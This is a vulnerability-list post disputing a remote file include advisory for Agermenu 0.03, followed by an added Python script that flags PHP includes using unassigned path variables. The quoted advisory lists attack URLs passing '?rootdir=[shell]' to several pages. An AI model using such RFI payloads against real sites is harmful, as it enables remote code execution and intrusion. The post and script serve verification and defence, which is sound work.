[VIM] false: Agermenu 0.03

str0ke str0ke at milw0rm.com
Wed Feb 7 15:56:45 EST 2007


$rootdir is defined on the top line of index.php and the rest.

/str0ke

Name: Agermenu 0.03 - Remote File Include Vulnerability

Script: http://www.chbs.dk/proj/agermenu/agermenu-0.03.tgz
*****************
ERROR:

index.php  ->   include $rootdir."inc/top.inc.php"; (line 4)
index.php  ->   include $rootdir."inc/bottom.inc.php"; (line 24)

about/contribute.php?rootdir=[shell]    ->   include $rootdir."inc/top.inc.php"; (line 5)
about/contribute.php?rootdir=[shell]    ->   include $rootdir."inc/bottom.inc.php"; (line 32)
**************************************************************************************
about/index.php?rootdir=[shell]  ->   include $rootdir."inc/top.inc.php"; (line 5)
about/index.php?rootdir=[shell]  ->   include $rootdir."inc/bottom.inc.php"; (line 20)
**************************************************************************************
about/using.php?rootdir=[shell]  ->   include $rootdir."inc/top.inc.php"; (line 5, 50)
about/using.php?rootdir=[shell]  ->   include $rootdir."inc/bottom.inc.php"; (line 67, 78)
**************************************************************************************
about/licenses/index.php?rootdir=[shell]  ->   include $rootdir."inc/top.inc.php"; (line 5)
about/licenses/index.php?rootdir=[shell]  ->   include $rootdir."inc/bottom.inc.php"; (line 30)
**************************************************************************************
kvastmo/index.php?rootdir=[shell] ->   include $rootdir."inc/top.inc.php"; (line 5)
kvastmo/index.php?rootdir=[shell] ->   include $rootdir."inc/bottom.inc.php"; (line 39)
**************************************************************************************
And more... almost all files have the include $rootdir ;) For the rest, download the script (above).
**************************************************************************************
RFI:

http://www.SITE.com/path/index.php?rootdir=[shell]
http://www.SITE.com/path/about/contribute.php?rootdir=[shell]
http://www.SITE.com/path/about/index.php?rootdir=[shell]
http://www.SITE.com/path/about/using.php?rootdir=[shell]
http://www.SITE.com/path/about/licenses/index.php?rootdir=[shell]
http://www.SITE.com/path/kvastmo/index.php?rootdir=[shell]
**************************************************************************************
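The point str0ke makes above is the one that decides whether a "$var in include" report is real: an include such as include $rootdir."inc/top.inc.php" is only reachable from the request if $rootdir is not assigned earlier in the same file (and register_globals or some other path lets the request set it). The script below is an added triage helper, not part of this mail, the quoted advisory, or Agermenu itself; the two PHP sources it scans are constructed to show the safe and the unsafe shape, and the regexes are a line-level heuristic that does not follow nested includes or parse PHP properly, so a hit still needs a look at the source by hand:

```python
import re
from typing import Dict, List, Set, Tuple

# Constructed sample PHP sources for illustration; these are NOT Agermenu's files.
# "index.php" has the layout described in the mail: $rootdir is assigned on the
# first code line, so the include path is fixed before the include runs, even
# if register_globals injected a request value earlier.  "about/plugin.php"
# never assigns $rootdir, which is the shape a genuine $rootdir RFI would have.
SAMPLES: Dict[str, str] = {
    "index.php": (
        '<?php\n'
        '$rootdir = "./";\n'
        'include $rootdir."inc/top.inc.php";\n'
        'echo "body";\n'
        'include $rootdir."inc/bottom.inc.php";\n'
    ),
    "about/plugin.php": (
        '<?php\n'
        '// no assignment of $rootdir anywhere in this file\n'
        'include $rootdir."inc/top.inc.php";\n'
        'include($rootdir . "inc/bottom.inc.php");\n'
    ),
}

# include/require (with or without parentheses) whose path starts with a variable
INCLUDE_RE = re.compile(
    r'\b(include|include_once|require|require_once)\s*\(?\s*\$(\w+)')
# "$var =" assignment; the lookahead rejects "==" / "===", and ".=" / "!=" / "<="
# never match because a non-space character sits between the name and "=".
ASSIGN_RE = re.compile(r'\$(\w+)\s*=(?!=)')


def unguarded_includes(src: str) -> List[Tuple[int, str]]:
    """Return (line_no, variable) for each include/require whose path variable
    has no assignment earlier in the same file, in source order."""
    assigned: Set[str] = set()
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(src.splitlines(), 1):
        # Drop trailing "//" comments (crude: also truncates "http://" in strings,
        # which is harmless for this check).
        code = line.split("//", 1)[0]
        events = [(m.start(), "assign", m.group(1))
                  for m in ASSIGN_RE.finditer(code)]
        events += [(m.start(), "include", m.group(2))
                   for m in INCLUDE_RE.finditer(code)]
        # Process in column order so "$p = 'x/'; include $p.'a.php';" is guarded.
        for _, kind, var in sorted(events):
            if kind == "assign":
                assigned.add(var)
            elif var not in assigned:
                findings.append((lineno, var))
    return findings


def triage(files: Dict[str, str]) -> Dict[str, List[Tuple[int, str]]]:
    """Map each file to its unguarded include sites; clean files are omitted."""
    report: Dict[str, List[Tuple[int, str]]] = {}
    for path, src in files.items():
        hits = unguarded_includes(src)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in triage(SAMPLES).items():
        for lineno, var in hits:
            print(f"{path}:{lineno}: include path uses ${var} with no prior assignment")
```

Run against a real tree by replacing SAMPLES with the files read from disk; an empty report for a file means the advisory's "?var=[shell]" URL cannot work for that file, which is exactly the situation the mail describes for Agermenu's index.php. A non-empty report is a candidate, not a confirmed RFI: the variable may still be assigned in a file included earlier, or register_globals may be off.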

